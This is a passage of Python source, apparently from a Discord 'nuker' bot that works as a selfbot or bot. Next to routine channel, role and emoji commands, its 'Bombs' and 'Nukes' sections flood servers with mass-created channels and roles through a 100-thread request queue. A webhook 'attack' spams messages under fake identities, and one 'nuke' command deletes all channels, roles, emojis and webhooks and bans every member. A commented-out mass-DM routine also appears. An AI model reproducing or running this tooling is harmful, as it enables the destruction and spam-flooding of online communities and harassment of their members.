# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
selected_server.create_custom_emoji(name=(name), image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find role `{name}`.')
await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find `{name}`.')
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.text_channels, channel_name)
if channel is None:
await log(ctx, f'Unable to find text channel `{channel_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.voice_channels, VC_name)
if channel is None:
await log(ctx, f'Unable to find voice channel `{VC_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.categories, category_name)
if channel is None:
await log(ctx, f'Unable to find category `{category_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
emoji = containing(selected_server.emojis, name)
if emoji is None:
await log(ctx, f'Unable to find channel `{name}`.')
try:
await emoji.delete(reason=None)
await (ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
while True:
requesting, url, headers, payload = q.get()
try:
# proxy = randomProxy('https')
# r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
if r.status_code == 429:
r = r.json()
if want_log_request:
if isinstance(r['retry_after'], int): # Discord will return all integer time if the retry after is less then 10 seconds which is in miliseconds.
r['retry_after'] /= 1000
if r['retry_after'] > 5:
consoleLog(f'Rate limiting has been reached, and this request has been cancelled due to retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
q.task_done()
continue
consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
q.put((requesting, url, headers, payload))
elif want_log_request and 'code' in r:
consoleLog('Request cancelled due to -> ' + r['message'])
except json.decoder.JSONDecodeError:
pass
# except requests.exceptions.ProxyError:
# consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
# q.put((requesting, url, headers, payload))
except requests.exceptions.ConnectTimeout:
consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long {proxy}')
q.put((requesting, url, headers, payload))
except Exception as e:
consoleLog(f'Unexpected error: {str(e)}')
q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
await log(ctx, f'More arguments is requested. You can put how many webhooks you want to create or channel id/name on the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
if int(name) < 0:
await log(ctx, f'You thought a smol negative number will break this bot?')
return
if len(channels) == 1 and int(name) <= 50: ## probably will replace this with auto check channel id
channels = selected_server.text_channels
if int(name) > len(channels):
await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t what to add more text channels. You can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
return
for i in range(int(name)):
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
q.join()
await log(ctx, f'`{name}` webhooks has been created.')
elif len(channels) == 1 and int(name) < 100000000:
await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
else:
for channel in channels:
checked_channel = containing(selected_server.text_channels, channel)
if checked_channel is None:
await log(ctx, f'Cannot find channel {channel}.')
continue
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
args.pop(0) # Removing the attack keyword
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
else:
for webhook in args:
webhook = containing(await selected_server.webhooks(), webhook)
if webhook is None:
await log(ctx, f'Unable to find webhook `{webhook}`.')
continue
webhook_targets.append(webhook)
loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
await log(ctx, f'`{str(loaded_length)}` has been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json` the bot next time will directly start with whatever is in that `.json` file.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. Already existed the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
description = f'Config for all the bomb commands.\nWhen you run bomb commands like `{settings["command_prefix"]}channelbomb 100 fixed` the fixed is the type of word list you are going to use. In this case the word list is going to randomly pick texts from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
